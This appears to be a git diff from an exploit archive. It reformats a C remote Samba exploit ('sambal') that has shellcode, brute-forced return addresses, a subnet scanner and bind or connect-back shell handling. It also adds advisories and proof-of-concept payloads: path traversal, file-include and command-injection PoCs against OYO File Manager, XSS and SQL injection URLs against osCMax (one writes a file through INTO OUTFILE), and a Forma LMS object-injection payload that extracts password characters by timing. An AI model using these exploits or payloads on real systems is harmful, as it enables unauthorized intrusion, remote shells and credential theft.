atoi(optarg); if (MAX_CHILDS == 0) { - fprintf(stderr, "Invalid number of chil -ds.\n"); + fprintf(stderr, "Invalid number of childs.\n"); return -1; } if (MAX_CHILDS > 99) { - fprintf(stderr, "Too many childs, using - 99. \n"); + fprintf(stderr, "Too many childs, using 99. \n"); MAX_CHILDS = 99; } @@ -918,13 +845,8 @@ ds.\n"); case 't': type = atoi(optarg); if (type == 0 || type > sizeof(targets) / 16) { - for(i = 0; i < sizeof(targets) / 16; i+ -+) - fprintf(stdout, "%02d. %s - [0x%08x]\n", i + 1, - - targets[i].type -, (unsigned int) targets[i].ret); + for(i = 0; i < sizeof(targets) / 16; i++) + fprintf(stdout, "%02d. %s [0x%08x]\n", i + 1, targets[i].type, (unsigned int) targets[i].ret); fprintf(stderr, "\n"); return -1; } @@ -939,8 +861,7 @@ ds.\n"); } - if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && - scan == 0)) + if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0)) usage(argv[0] == NULL ? "sambal" : argv[0]); if (scan == 1) @@ -967,20 +888,17 @@ ds.\n"); for (ip4 = 0; ip4 < 255; ip4++) { i++; - snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.% -u.%u", ip1, ip2, ip3, ip4); + snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.%u.%u", ip1, ip2, ip3, ip4); usleep(BRUTE_DELAY); switch (fork()) { case 0: switch(is_samba(scan_ip, 2)) { case 0: - fprintf(stdout, - "+ [%s] Samba\n", scan_ip); + fprintf(stdout, "+ [%s] Samba\n", scan_ip); break; case 1: - fprintf(stdout, - "+ [%s] Windows\n", scan_ip); + fprintf(stdout, "+ [%s] Windows\n", scan_ip); break; default: break; @@ -989,8 +907,7 @@ u.%u", ip1, ip2, ip3, ip4); exit(0); break; case -1: - fprintf(stderr, "+ fork() error -\n"); + fprintf(stderr, "+ fork() error\n"); exit(-1); break; default: @@ -1022,8 +939,7 @@ u.%u", ip1, ip2, ip3, ip4); shellcode = targets[type - 1].shellcode; if (connectback == 1) { - fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:452 -95]\n", + fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:45295]\n", ip1, ip2, ip3, ip4); switch(targets[type - 1].os_type) { @@ -1061,31 +977,26 @@ u.%u", ip1, ip2, ip3, ip4); addr2.sin_family = AF_INET; addr2.sin_port = htons(45295); - if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == --1) { + if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) { fprintf(stderr, "+ connect() error.\n"); return -1; } - if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].t -ype); + if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].type); if (force == 0) { if (is_samba(argv[optind], 2) != 0) { - fprintf(stderr, "+ Host is not running samba!\n -\n"); + fprintf(stderr, "+ Host is not running samba!\n\n"); return -1; } fprintf(stderr, "+ Host is running samba.\n"); } - if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", ( -char *)inet_ntoa(addr1.sin_addr), port); + if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port); - if (start_session(sock) < 0) fprintf(stderr, "+ Session failed. -\n"); + if (start_session(sock) < 0) fprintf(stderr, "+ Session failed.\n"); if (verbose == 1) fprintf(stdout, "+ Session enstablished\n"); sleep(5); @@ -1104,16 +1015,13 @@ char *)inet_ntoa(addr1.sin_addr), port); sleep(2); if (connectback == 0) { - if(connect(sock2, (struct sockaddr *)&addr2, sizeof(add -r2)) == -1) { - fprintf(stderr, "+ Exploit failed, try -b to br -uteforce.\n"); + if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) { + fprintf(stderr, "+ Exploit failed, try -b to bruteforce.\n"); return -1; } - fprintf(stdout, "-------------------------------------- -------------------------\n"); + fprintf(stdout, "--------------------------------------------------------------\n"); shell(sock2); close(sock); @@ -1138,20 +1046,17 @@ uteforce.\n"); case 1: if (ret == 0) ret = 0xbfc00000; shellcode = bsd_bindcode; - fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\ -n"); + fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\n"); break; case 2: if (ret == 0) ret = 0xdfc00000; shellcode = bsd_bindcode; - fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and pr -ior)\n"); + fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and prior)\n"); break; case 3: if (ret == 0) ret = 0x00170000; shellcode = bsd_bindcode; - fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non- -exec stack)\n"); + fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non-exec stack)\n"); break; } @@ -1182,8 +1087,7 @@ exec stack)\n"); if (sock2 > 2) close(sock2); if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) { - if (verbose == 1) fprintf(stderr, "+ socket() error.\n" -); + if (verbose == 1) fprintf(stderr, "+ socket() error.\n"); } else { ret -= STEPS; @@ -1191,21 +1095,18 @@ exec stack)\n"); } if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) - if (verbose == 1) fprintf(stderr, "+ socket() error.\n" -); + if (verbose == 1) fprintf(stderr, "+ socket() error.\n"); if ((ret & 0xff) == 0x00 && brute != 3) ret++; - if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (u -nsigned int)ret); + if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (unsigned int)ret); usleep(BRUTE_DELAY); switch (childs[i] = fork()) { case 0: - if(Connect(sock, (char *)inet_ntoa(addr1.sin_ad -dr), port, 2) == -1) { + if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), port, 2) == -1) { if (sock > 2) close(sock); if (sock2 > 2) close(sock2); exit(-1); @@ -1213,30 +1114,23 @@ dr), port, 2) == -1) { if(write_timer(sock, 3) == 1) { if (start_session(sock) < 0) { - if (verbose == 1) fprintf(stder -r, "+ Session failed.\n"); + if (verbose == 1) fprintf(stderr, "+ Session failed.\n"); if (sock > 2)close(sock); if (sock2 > 2) close(sock2); exit(-1); } if (brute == 3) { - if (exploit_openbsd32(sock, ret -, shellcode) < 0) { - if (verbose == 1) fprin -tf(stderr, "+ Failed.\n"); - if (sock > 2) close(so -ck); - if (sock2 > 2) close(so -ck2); + if (exploit_openbsd32(sock, ret, shellcode) < 0) { + if (verbose == 1) fprintf(stderr, "+ Failed.\n"); + if (sock > 2) close(sock); + if (sock2 > 2) close(sock2); exit(-1); } } else { - if (exploit_normal(sock, ret, shellcode -) < 0) { - if (verbose == 1) fprintf(stder -r, "+ Failed.\n"); + if (exploit_normal(sock, ret, shellcode) < 0) { + if (verbose == 1) fprintf(stderr, "+ Failed.\n"); if (sock > 2) close(sock); if (sock2 > 2) close(sock2); exit(-1); @@ -1244,14 +1138,12 @@ r, "+ Failed.\n"); if (sock > 2) close(sock); - if ((sock2 = socket(AF_INET, SOCK_STREA -M, 6)) < 0) { + if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) { if (sock2 > 2) close(sock2); exit(-1); } - if(Connect(sock2, (char *)inet_ntoa(add -r1.sin_addr), 45295, 2) != -1) { + if(Connect(sock2, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) { if (sock2 > 2) close(sock2); kill(getppid(), SIGUSR1); } diff --git a/platforms/multiple/webapps/37058.txt b/platforms/multiple/webapps/37058.txt new file mode 100755 index 000000000..8695011ec --- /dev/null +++ b/platforms/multiple/webapps/37058.txt @@ -0,0 +1,355 @@ +Document Title: +=============== +OYO File Manager 1.1 iOS&Android - Multiple Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1494 + + +Release Date: +============= +2015-05-18 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1493 + + +Common Vulnerability Scoring System: +==================================== +6.9 + + +Product & Service Introduction: +=============================== +OYO File Manager, helps you to manage files in your mobile from your computer over wifi, without USB cable. Also, view your photo albums, play songs and videos. +Store files in drive page and do all the file operations, such as Create, Move, Delete, Edit, Copy, Rename, Zip, unzip, and get information about file. + +(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/oyo-file-manager/id981145759 & https://play.google.com/store/apps/details?id=com.whatbig.filemanager ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Core Research team discovered multiple Vulnerabilities in the official OYO File Manager v1.1 iOS & Android mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2015-05-18: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Balaji Rajan +Product: OYO File Manager - iOS & Android 1.1 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +1.1 Local File Include Vulnerability +A local file include web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application. +The file include vulnerability allows remote attackers to unauthorized include local file/path requests to compromise the mobile web-application. + +The web vulnerability is located in the `filename` value of the `upload(GCDWebUploader)` module. Attackers are able to inject own files with malicious +`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in +the index file dir listing and sub folders of the wifi interface. The attacker is able to inject the local file include request by usage of the +`wifi interface` in connection with the vulnerable file upload POST method request. Injects are also possible via local file sync function. +Local attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious +attack requests. + +The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5. +Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. +Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise. + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] upload (GCDWebUploader) + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] Index File Dir Listing (http://localhost:8080/) + + +1.2 Local Command Injection Vulnerability +A local command inject web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application. +The issue allows remote attackers to inject own commands by usage of stable device values to compromise the ios or android mobile web-application. + +The command inject vulnerability is located in the vulnerable `devicename` value of the `index` module. Local attackers are able to inject own +own malicious system specific commands to requests the vulnerable `devicename` value. The devicename value is displayed in the header location +of the file dir index module. The execution point is in the main index context and the injection point is the local device to app sync. + +The attack vector is located on the application-side and the injection requires physical device access or a local low privileged device user account. +Local attackers are also able to exploit the devicename validation issue in combination with persistent injected script codes. + +The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6. +Exploitation of the command/path inject vulnerability requires a low privileged ios/android device account with restricted access and no user interaction. +Successful exploitation of the vulnerability results in unauthorized execution of system specific commands to compromise the mobile Android/iOS application +or the connected device components. + +Request Method(s): + [+] [SYNC] + +Vulnerable Module(s): + [+] Path Listing + +Vulnerable Parameter(s): + [+] devicename + + + +1.3 Remote Path Traversal Vulnerability +A Path Traveral web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application. +The security vulnerability allows remote attackers to unauthorized request system path variables to compromise the mobile application or device. + +The vulnerability is located in the `path` value of the `open and list` interface module. Remote attackers are able to change the path variable +to unauthorized request device files or directories. The vulnerability can be exploited by local or remote attackers without user interaction. +The attack vector is located on the application-side of the service and the request method to execute is GET (client-side). + +The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. +Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction. +Successful exploitation of the vulnerability results in mobile application compromise. + +Request Method(s): + [+] GET + +Vulnerable Module(s): + [+] open + [+] list + +Vulnerable Parameter(s): + [+] path + +Affected Module(s): + [+] Index File Dir Listing (http://localhost:8080/) + + +Proof of Concept (PoC): +======================= +1.1 +The file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + +Manual steps to reproduce the vulnerability ... +1. Open the interface +2. Start a session tamper +3. Upload a reandom file +4. Change in the upload POST method request the vulnerable filename to a local file variable +Note: The website reloads +5. The execution occurs in the main file dir index were the upload has been replaced +6. Successful reproduce of the mobile web vulnerability! + +--- PoC Session Logs [POST] --- + +Status: 200[OK] +POST http://localhost/upload +Load Flags[LOAD_BYPASS_CACHE ] Größe des Inhalts[2] Mime Type[application/json] + Request Header: + Host[localhost] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] + Accept[application/json, text/javascript, */*; q=0.01] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost/] + Content-Length[831] + Content-Type[multipart/form-data; boundary=---------------------------33361466725643] + Connection[keep-alive] + Pragma[no-cache] + Cache-Control[no-cache] + POST-Daten: + POST_DATA[-----------------------------33361466725643 +Content-Disposition: form-data; name="path"/test23/ +-----------------------------33361466725643 +Content-Disposition: form-data; name="files[]"; filename="../[LOCAL FILE INCLUDE VULNERABILITY!]testfile.png" +Content-Type: image/png +- Response +Status=OK - 200 +Server=GCDWebUploader +Cache-Control=no-cache +Content-Length=2 +Content-Type=application/json +Connection=Close +Date=Tue, 12 May 2015 12:24:23 GMT + + + +Reference(s): +http://localhost/upload + + +1.2 +The local command inject web vulnerability can be exploited by local attackers with low privilege application user account and low user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + +Manual steps to reproduce the vulnerability ... +1. Install the android or ios application to your device +2. Start the application +3. Change the local devicename value in the ios settings to a own payload string (local command inject) +4. Save the settings +5. Open the wifi interface and watch the index webserver site +6. The execution occurs in the header location of the webpage were the devicename value is visible +6. Successful reproduce of the mobile web vulnerability! + + +PoC: +OYO +[LOCAL COMMAND INJECT VULNERABILITY!]23 IOS Version 8.3 + +
+
+ 25.89 GB used
+ + +
+ 1.30 GB free space +
+ + + +1.3 +the path traversal web vulnerability can be exploited by remote attackers without user interaction or privilege web application user account. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + +PoC: Payload(s) +http://localhost/list?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/ +http://localhost/open?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/ +http://localhost/download?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/ + +--- PoC Session Logs [GET] --- + +Status: 200[OK] +GET http://localhost/list?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/PENG.png +Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[59] Mime Type[application/json] + Request Header: + Host[localhost] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] + Accept[application/json, text/javascript, */*; q=0.01] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost/] + Connection[keep-alive] + Response Header: + Server[GCDWebUploader] + Cache-Control[no-cache] + Content-Length[59] + Content-Type[application/json] + Connection[Close] + Date[Tue, 12 May 2015 12:24:25 GMT] + + +14:21:43.214[9ms][total 9ms] Status: 200[OK] +GET http://localhost/open?path=/%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/PENG.png Load Flags[LOAD_NORMAL] Größe des Inhalts[538] Mime Type[image/png] + Request Header: + Host[localhost] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0] + Accept[image/png,image/*;q=0.8,*/*;q=0.5] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost/] + Connection[keep-alive] + Response Header: + Etag[8831597/1431433463/0] + Last-Modified[Tue, 12 May 2015 12:24:23 GMT] + Server[GCDWebUploader] + Content-Type[image/png] + Content-Length[538] + Connection[Close] + Date[Tue, 12 May 2015 12:24:25 GMT] + Cache-Control[no-cache] + + + + +Reference(s): +http://localhost/list?path= +http://localhost/open?path= +http://localhost/download?path= + + +Solution - Fix & Patch: +======================= +1.1 +The local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload POST method request. +Restrict the input and disallow special chars. Parse the output in the file dir index list to prevent local file include attacks via upload. + +1.2 +Restrict the devicename value and disallow special chars. Encode the devicename value to prevent local command injection attacks. + +1.3 +The directory traversal web vulnerability can be patched by a secure restriction and parse of the path name value in the open and list module context. +Encode the input of files to folders and disallow special chars. Implement a whitelist or a exception to prevent unauthorized path value requests via GET method. + + +Security Risk: +============== +1.1 +The security risk of the local file include web vulnerability in the filename value of the manager is estimated as high. (CVSS 6.5) + +1.2 +The security risk of the local command inject web vulnerability in the devicename value of the manager is estimated as high. (CVSS 5.6) + +1.3 +The security risk of the path traversal web vulnerability in the path value of the manager is estimated as high. (CVSS 6.9) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com +PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt + + diff --git a/platforms/php/webapps/37038.txt b/platforms/php/webapps/37038.txt new file mode 100755 index 000000000..91574f336 --- /dev/null +++ b/platforms/php/webapps/37038.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/52886/info + +osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +osCMax 2.5.0 is vulnerable; prior versions may also be affected. + +
+ + + +
\ No newline at end of file diff --git a/platforms/php/webapps/37039.txt b/platforms/php/webapps/37039.txt new file mode 100755 index 000000000..25bc229e3 --- /dev/null +++ b/platforms/php/webapps/37039.txt @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/52886/info + +osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +osCMax 2.5.0 is vulnerable; prior versions may also be affected. + +
+ + + + + + +
\ No newline at end of file diff --git a/platforms/php/webapps/37040.txt b/platforms/php/webapps/37040.txt new file mode 100755 index 000000000..acd23f8f0 --- /dev/null +++ b/platforms/php/webapps/37040.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52886/info + +osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +osCMax 2.5.0 is vulnerable; prior versions may also be affected. + +http://www.example.com/admin/xsell.php?search=%27%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37041.txt b/platforms/php/webapps/37041.txt new file mode 100755 index 000000000..3454325b1 --- /dev/null +++ b/platforms/php/webapps/37041.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/52886/info + +osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +osCMax 2.5.0 is vulnerable; prior versions may also be affected. + +http://www.example.com/admin/stats_products_purchased.php?gross=%22%20%3E%3Cscript%3Ealert%28document.cookie% 29;%3C/script%3E +http://www.example.com/admin/stats_products_purchased.php?max=%27%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E \ No newline at end of file diff --git a/platforms/php/webapps/37042.txt b/platforms/php/webapps/37042.txt new file mode 100755 index 000000000..9e1dd80c0 --- /dev/null +++ b/platforms/php/webapps/37042.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52886/info + +osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +osCMax 2.5.0 is vulnerable; prior versions may also be affected. + +http://www.example.com/admin/stats_monthly_sales.php?status=%27%3Cscript%3Ealert%28document.cookie%29;%3C/scr ipt%3E \ No newline at end of file diff --git a/platforms/php/webapps/37043.txt b/platforms/php/webapps/37043.txt new file mode 100755 index 000000000..9d6a0ad92 --- /dev/null +++ b/platforms/php/webapps/37043.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52886/info + +osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +osCMax 2.5.0 is vulnerable; prior versions may also be affected. + +http://www.example.com/admin/stats_customers.php?sorted=%27%3Cscript%3Ealert%28document.cookie%29;%3C/script% 3E \ No newline at end of file diff --git a/platforms/php/webapps/37044.txt b/platforms/php/webapps/37044.txt new file mode 100755 index 000000000..c886542b6 --- /dev/null +++ b/platforms/php/webapps/37044.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52886/info + +osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +osCMax 2.5.0 is vulnerable; prior versions may also be affected. + +http://www.example.com/admin/information_manager.php?information_action=Edit&information_id=%3Cscript%3Ea lert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37045.txt b/platforms/php/webapps/37045.txt new file mode 100755 index 000000000..590534349 --- /dev/null +++ b/platforms/php/webapps/37045.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52886/info + +osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +osCMax 2.5.0 is vulnerable; prior versions may also be affected. + +http://www.example.com/admin/geo_zones.php?action=list&zID=%27%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37046.txt b/platforms/php/webapps/37046.txt new file mode 100755 index 000000000..18e11e84c --- /dev/null +++ b/platforms/php/webapps/37046.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52886/info + +osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +osCMax 2.5.0 is vulnerable; prior versions may also be affected. + +http://www.example.com/admin/new_attributes_include.php?pageTitle=%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37047.html b/platforms/php/webapps/37047.html new file mode 100755 index 000000000..535170813 --- /dev/null +++ b/platforms/php/webapps/37047.html @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/52886/info + +osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +osCMax 2.5.0 is vulnerable; prior versions may also be affected. + +
+ + + +
\ No newline at end of file diff --git a/platforms/php/webapps/37048.txt b/platforms/php/webapps/37048.txt new file mode 100755 index 000000000..82b5d768c --- /dev/null +++ b/platforms/php/webapps/37048.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52886/info + +osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +osCMax 2.5.0 is vulnerable; prior versions may also be affected. + +http://www.example.com/admin/stats_monthly_sales.php?status=0 union select '' INTO OUTFILE '../../../path/to/site/file.php' \ No newline at end of file diff --git a/platforms/php/webapps/37055.txt b/platforms/php/webapps/37055.txt new file mode 100755 index 000000000..edb4280c4 --- /dev/null +++ b/platforms/php/webapps/37055.txt @@ -0,0 +1,56 @@ +Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities + +[+] Author: Filippo Roncari +[+] Target: Forma LMS +[+] Version: 1.3 and probably lower +[+] Vendor: http://www.formalms.org +[+] Accessibility: Remote +[+] Severity: High +[+] CVE: +[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf +[+] Info: f.roncari@securenetwork.it / f@unsec.it + + +[+] Summary +Forma LMS is a corporate oriented Learning Management System, used to manage and deliver online training courses. Forma LMS is SCORM compliant with enterprise class features like multi-client architecture, custom report generation, native ecommerce and catalogue management, integration API, and more. + + +[+] Vulnerability Details +Forma LMS 1.3 is prone to multiple PHP Object Injection vulnerabilities, due to a repeated unsafe use of the unserialize() function, which allows unprivileged users to inject arbitrary PHP objects. A potential attacker could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input, in order to execute code on the remote server or abuse arbitrary functionalities. + + +[+] Technical Details +See full advisory at https://www.securenetwork.it/docs/advisory/SN-15-03_Formalms.pdf for the list of identified OI flaws and further technical details. + + +[+] Proof of Concept (PoC) +The following PoC shows how to abuse the unsafe unserialize() called in writemessage() function in order to trigger a SQL injection flaw. This is an alternative way to exploit one of the identified OI, since a quick check did not highlight useful magic methods. The PoC as well as the other identified vulnerabilities are further detailed in the full advisory. + + + [!] PoC Payload + ---------------------------- + a:2:{i:0;s:122:"0) union select if(substring(pass,1,1) = char(53),benchmark(5000000,encode(1,2)),null) from core_user where idst=11836-- ";i:1;s:1:"1";} + ---------------------------- + + [!] PoC Request + ---------------------------- + POST /formalms/appLms/index.php?modname=message&op=writemessage HTTP/1.1 + Host: localhost + Cookie: docebo_session=91853e7eca413578de70304f94a43fe1 + Content-Type: multipart/form-data; boundary=---------------------------1657367614367103261183989796 + Content-Length: 1453 + + [...] + + -----------------------------1657367614367103261183989796 + Content-Disposition: form-data; name="message[recipients]" + + a%3A2%3A%7Bi%3A0%3Bs%3A122%3A%220%29+union+SELECT+IF%28SUBSTRING%28pass%2C1%2C1%29+%3D+ char%2853%29%2Cbenchmark%285000000%2Cencode%281%2C2%29%29%2Cnull%29+from+core_user+where+idst% 3D11836--++%22%3Bi%3A1%3Bs%3A1%3A%221%22%3B%7D + + [...] + -------------------------- + + + +[+] Disclaimer +Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. \ No newline at end of file diff --git a/platforms/windows/dos/37060.html b/platforms/windows/dos/37060.html new file mode 100755 index 000000000..989193719 --- /dev/null +++ b/platforms/windows/dos/37060.html @@ -0,0 +1,55 @@ +# Exploit Title: Internet Explorer 11 - Crash PoC +# Google Dork: N/A +# Date: 19th May, 2015 +# Exploit Author: garage4hackers +# Vendor Homepage: http://garage4hackers.com/showthread.php?t=6246 +# Software Link: N/A +# Version: Tested on IE 11 +# Tested on: Windows 7 +# CVE : N/A + + + +case522207.html + + + + + + +How do I reproduce 